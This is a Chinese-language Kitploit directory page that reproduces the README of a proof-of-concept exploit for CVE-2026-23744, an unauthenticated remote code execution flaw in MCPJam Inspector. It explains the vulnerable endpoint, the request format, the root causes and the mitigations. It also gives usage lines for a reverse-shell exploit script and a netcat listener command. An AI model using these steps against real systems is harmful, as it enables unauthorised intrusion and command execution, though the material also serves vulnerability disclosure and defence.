Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2026-23744 — 针对 CVE-2026-23744 的概念验证漏洞利用程序,该漏洞是 MCPJam Inspector 中的一个未认证远程代码执行(RCE)漏洞。通过易受攻击的 API 端点提供反向 Shell 和命令执行功能。 | Kitploit
工具/GitHubGitHub/rohit-sundar/cve-2026-23744
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育远程访问工具实验室与实践
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

针对 CVE-2026-23744 的概念验证漏洞利用程序,该漏洞是 MCPJam Inspector 中的一个未认证远程代码执行(RCE)漏洞。通过易受攻击的 API 端点提供反向 Shell 和命令执行功能。

2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-23744 – MCPJam Inspector 未认证远程代码执行(RCE)

描述

  • 产品:MCPJam Inspector
  • 受影响版本:≤ 1.4.2
  • 修复版本:1.4.3
  • 类型:未认证远程代码执行(RCE)
  • 攻击向量:网络
  • 是否需要认证:否
  • 是否需要用户交互:否
  • CVSS v3.1:9.8(严重)

CVE-2026-23744 是一个影响 MCPJam Inspector ≤ 1.4.2 的严重 未认证远程代码执行(RCE) 漏洞。问题在于 Inspector 暴露了一个管理端点(/api/mcp/connect),该端点接受用户可控的 MCP 服务器配置,并且可以在缺乏适当认证或安全限制的情况下触发进程执行。受影响版本默认监听 0.0.0.0(所有接口)而非 localhost,这使得服务在网络可达时可以被远程利用。

技术细节

该漏洞与以下端点相关:

root@kitploit:~
POST /api/mcp/connect

该端点接受一个包含服务器配置的 JSON 对象,例如:

root@kitploit:~
{
  "serverConfig": {
    "command": "<executable>",
    "args": ["<arguments>"],
    "env": {}
  },
  "serverId": "<identifier>"
}

MCPJam Inspector 随后使用此提供的配置来创建和管理新的 MCP 服务器进程。由于该端点缺乏足够的认证和安全控制,攻击者可以提交任意进程定义,并由 Inspector 服务执行。

从根本上说,该漏洞是一个**关键功能缺少认证(CWE-306)**问题,即应用程序将原本面向可信本地用户的功能暴露出来,并在缺乏足够安全检查的情况下通过网络可访问。

根本原因

该漏洞源于两个设计缺陷:

  1. 对进程管理的未认证访问
  • API 允许用户定义 MCP 服务器的启动方式。
  • 关键功能无需认证即可访问。
  • 应用程序信任用户可控的进程参数,未进行任何进一步验证。
  1. 不安全的默认暴露
  • MCPJam Inspector 默认监听 0.0.0.0。
  • 管理 API 可从网络上的其他系统访问。
  • 攻击者可以直接远程与进程创建功能交互。

由此产生的攻击路径可如下所示:

root@kitploit:~
Attacker → /api/mcp/connect → Process Creation → Operating System

由于应用程序直接与操作系统进程创建接口交互,成功利用可在 MCPJam Inspector 服务的安全上下文中执行任意命令。

使用方法

root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
  • -t(或)--target:目标 URL 或目标 IP 地址。
  • -tport(或)--target-port:要连接的目标端口,大多数情况下 MCPJam Inspector 为 6274。如果 MCPJam Inspector 托管在其他位置(例如子域名或虚拟主机),请勿使用此参数,而应使用 -t 参数指定子域名或虚拟主机。
  • -lhost(或)--local-host:用于反向 shell 回连的公网 IP 地址。
  • -lport(或)--local-port:用于反向 shell 的端口。
root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
  • -c(或)--command:要在目标上执行的命令。

在使用此程序之前,你必须先在本地机器上使用 Netcat 启动一个监听器。

为此,请使用以下命令:

root@kitploit:~
nc -lvnp <port>

然后,运行上述命令即可在目标上获得一个反向 shell。

影响

成功利用可能允许攻击者:

  • 在目标主机上执行任意命令,
  • 读取或修改敏感文件,
  • 安装持久化机制,
  • 部署其他恶意软件或工具,
  • 在环境中横向移动到其他系统,
  • 根据服务权限可能实现完全的系统入侵。

该漏洞被评定为 CVSS v3.1 评分 9.8(严重),原因是其基于网络的攻击向量、无需认证、无需用户交互,以及对机密性、完整性和可用性的高影响。

缓解措施

立即升级到 MCPJam Inspector 1.4.3 或更高版本。其他防御措施包括:

  • 限制对 Inspector 界面的访问,
  • 尽可能将服务绑定到 localhost,
  • 通过防火墙规则限制暴露面,
  • 以所需的最低权限运行服务,
  • 监控未经授权的访问尝试。

免责声明

本 PoC 仅用于教育、防御性安全研究和授权的安全测试。它只能用于获得明确许可的系统。未经授权对第三方系统使用可能违反适用的法律法规。本仓库所有者不对因使用此程序造成的任何损害负责。

来源

  1. MITRE CVE 记录 – CVE-2026-23744
  2. NIST 国家漏洞数据库(NVD)– CVE-2026-23744
  3. GitHub 安全公告(GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – 漏洞查询
  5. CVE-2026-23744:针对开发者的 MCPJam Inspector 严重 RCE 漏洞 – CrowdSec
  6. CVE-2026-23744:MCPJam Inspector RCE 漏洞 – SentinelOne
下载工具